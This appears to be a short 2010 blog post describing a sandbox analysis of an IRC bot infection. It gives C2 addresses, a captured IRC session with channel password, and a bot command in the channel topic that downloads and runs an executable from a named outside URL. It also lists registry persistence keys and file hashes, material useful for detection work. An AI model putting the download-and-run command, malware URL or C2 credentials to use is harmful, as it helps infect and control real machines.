216.66.78.116

By Pig, January 14, 2010

Remote Host Port Number
206.188.193.39 80
216.66.78.116 6567

MODE [SH|USA|00|P|33762] -ix
JOIN #salvando# c1rc0s0leil
PRIVMSG #salvando# :[Dl]: File download: 117.7KB to: c:windowswichin.exe @ 117.7KB/sec.
PRIVMSG #salvando# :[Dl]: Created process: “c:windowswichin.exe”, PID:
PONG Google.Rules.Com
NICK [SH|USA|00|P|33762]
USER XP-9702 * 0 :COMPUTERNAME
Now talking in #salvando#
Topic On: [ #salvando# ] [ .desfi http://www.johngarzon.com.co/menu/xd/wichin.exe c:windowswichin.exe 1 ]
Topic By: [ Google ]
Modes On: [ #salvando# ] [ +smntMu ]

PASS pr1v4d0onl1n3r

* The data identified by the following URL was then requested from the remote web server:
o http://www.johngarzon.com.co/menu/xd/wichin.exe

* The following port was open in the system:

Port Protocol Process
1053 TCP conmsyrtl.exe (%Windir%conmsyrtl.exe)

Registry Modifications

* The following Registry Keys were created:
o HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet Explorer
o HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerControl Panel

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Sistema de Comm = “conmsyrtl.exe”

so that conmsyrtl.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTerminal ServerInstallSoftwareMicrosoftWindowsCurrentVersionRun]
+ Sistema de Comm = “conmsyrtl.exe”

so that conmsyrtl.exe runs every time Windows starts
o [HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerControl Panel]
+ HomePage = 0x00000001

* The following Registry Value was modified:
o [HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain]
+ Start Page =

Memory Modifications

* There were new processes created in the system:

Process Name Process Filename Main Module Size
conmsyrtl.exe %Windir%conmsyrtl.exe 331 776 bytes
wichin.exe %Windir%wichin.exe 20 480 bytes

File System Modifications

* The following files were created in the system:

# Filename(s) File Size File Hash
1 %Windir%conmsyrtl.exe
[file and pathname of the sample #1] 153 254 bytes MD5: 0x8F92EBBE21B834107F4A1CFD95F28F71
SHA-1: 0x06337C454ECEC5E3217C8A6772E7F712E39C2F2E
2 %Windir%wichin.exe 120 489 bytes MD5: 0xBED0834231040FA354233E2FB2F601B9
SHA-1: 0x8F28AB98BFE82BF3BC96CF5E64D5EE17E7E0E448

Categories: Uncategorized
Previous post
Next post